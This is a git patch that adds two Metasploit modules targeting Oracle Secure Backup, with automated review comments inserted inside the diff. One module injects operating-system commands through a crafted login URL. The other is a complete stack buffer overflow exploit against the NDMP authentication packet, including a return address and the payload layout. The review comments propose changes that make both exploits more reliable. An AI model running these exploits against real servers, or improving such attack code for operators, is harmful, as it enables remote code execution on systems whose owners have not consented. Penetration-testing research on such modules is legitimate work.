From 7118ef0a2cddf8df8925db5f2a7bba963581e712 Mon Sep 17 00:00:00 2001
From: Mario Ceballos
Date: Mon, 23 Feb 2009 16:26:00 +0000
Subject: [PATCH] added aux module osb_execqr.rb and exploit module osb_ndmp_auth.rb.
git-svn-id: file:///home/svn/framework3/trunk@6248 4d416f70-5f16-0410-b530-b9f4589650da
---
modules/auxiliary/admin/oracle/osb_execqr.rb | 56 ++++++++++++
.../exploits/windows/oracle/osb_ndmp_auth.rb | 88 +++++++++++++++++++
2 files changed, 144 insertions(+)
create mode 100644 modules/auxiliary/admin/oracle/osb_execqr.rb
create mode 100644 modules/exploits/windows/oracle/osb_ndmp_auth.rb
diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb
new file mode 100644
index 0000000000..75a6281938
--- /dev/null
+++ b/modules/auxiliary/admin/oracle/osb_execqr.rb
@@ -0,0 +1,56 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Oracle Secure Backup exec_qr() Command Injection Vulnerability',
+ 'Description' => %q{
+ This module exploits a command injection vulnerablility in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.
+ },
+ 'Author' => [ 'MC' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision: $',
+ 'References' =>
+ [
+ [ 'CVE', '2008-5448' ],
+ [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-003' ],
+ ],
+ 'DisclosureDate' => 'Jan 14 2009'))
+
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]),
+ OptBool.new('SSL', [true, 'Use SSL', true]),
+ ], self.class)
+ end
+
+ def run
+
+ r = Rex::Text.rand_text_english(2)
+
+ cmd = datastore['CMD']
+
+ uri = "/login.php?clear=no&ora_osb_lcookie=&ora_osb_bgcookie=#{r}&button=Logout&rbtool="
+
+ req = uri + Rex::Text.uri_encode(cmd)
+
+ print_status("Sending command: #{datastore['CMD']}...")
+
+ res = send_request_raw({'uri' => req,},5)
+
+ print_status("Done.")
+
+ end
+end
diff --git a/modules/exploits/windows/oracle/osb_ndmp_auth.rb b/modules/exploits/windows/oracle/osb_ndmp_auth.rb
new file mode 100644
index 0000000000..afadfc313b
--- /dev/null
+++ b/modules/exploits/windows/oracle/osb_ndmp_auth.rb
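Review bot: `res = send_request_raw({'uri' => req,},5)` at the end of `run` stores the response and never looks at it, so `print_status("Done.")` is printed whether the server answered, returned an error status, or simply timed out after the 5-second limit. Reporting the outcome, `if res then print_status("Server responded: HTTP #{res.code}") else print_error("No response received within 5 seconds") end`, would let the operator tell a delivered request from a dead port and removes the dead assignment. Two smaller points: the `cmd` local is already set from `datastore['CMD']`, so the status line above the request could reuse it instead of re-reading the datastore, and the description spells `vulnerablility` where `vulnerability` is meant.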
@@ -0,0 +1,88 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ include Msf::Exploit::Remote::NDMP
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow',
+ 'Description' => %q{
+ The module exploits a stack overflow in Oracle Secure Backup.
+ When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet,
+ an attacker may be able to execute arbitrary code.
+ },
+ 'Author' => [ 'MC' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision:$',
+ 'References' =>
+ [
+ [ 'CVE', '2008-5444' ],
+ [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html' ],
+ ],
+ 'Platform' => 'win',
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00",
+ 'StackAdjustment' => -3500,
+ 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
+ },
+ 'Targets' =>
+ [
+ [ 'Oracle Secure Backup 10.1.0.3 (Windows 2003 SP0/Windows XP SP3)', { 'Ret' => 0x608f5a28 } ], # oracore10.dll
+ ],
+ 'DisclosureDate' => 'Jan 14 2009',
+ 'DefaultTarget' => 0))
+
+ register_options([Opt::RPORT(10000)], self.class)
+ end
+
+ def exploit
+ connect
+
+ print_status("Trying target #{target.name}...")
+
+ ndmp_recv()
+
+ username = rand_text_alphanumeric(3789 - payload.encoded.length)
+ username << payload.encoded + Rex::Arch::X86.jmp_short(6)
+ username << make_nops(2) + [target.ret].pack('V') + [0xe8, -850].pack('CV')
+ username << rand_text_alphanumeric(5000 - 3793 - payload.encoded.length - 8 - 5)
+
+ password = rand_text_alphanumeric(rand(25) + 1)
+
+ # Create the authentication request
+ auth = [
+ 0, # Sequence number
+ Time.now.to_i, # Current time
+ 0, # Message type (request)
+ 0x901, # Message name (connect_client_auth)
+ 0, # Reply sequence number
+ 0, # Error status
+ 1 # Authentication type
+ ].pack('NNNNNNN') +
+ [ username.length ].pack('N') + username +
+ [ password.length ].pack('N') + password +
+ [ 4 ].pack('N')
+
+ print_status("Sending authentication request...")
+ ndmp_send(auth)
+
+ handler
+ disconnect
+ end
+
+end
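Review bot: The value returned by `ndmp_recv()` right after `connect` in `exploit` is discarded, so the module goes on to build and send the request even when the peer returned nothing or something other than an NDMP greeting, and a wrong or closed port only surfaces later as a silent handler timeout. Keeping the reply and stopping early, `greeting = ndmp_recv` followed by `if greeting.nil? then print_error("No NDMP greeting received"); disconnect; return end`, makes that failure explicit; what `ndmp_recv` returns on timeout is defined by the NDMP mixin, which is outside this commit, so the nil check is an assumption to confirm. Style: `ndmp_recv()` is the only no-argument call in the method written with empty parentheses (`connect`, `handler`, `disconnect` omit them), the description opens with `The module exploits` where the sibling module uses `This module exploits`, and `'Version' => '$Revision:$'` differs from the `'$Revision: $'` form in osb_execqr.rb in the same commit, which may matter for keyword expansion.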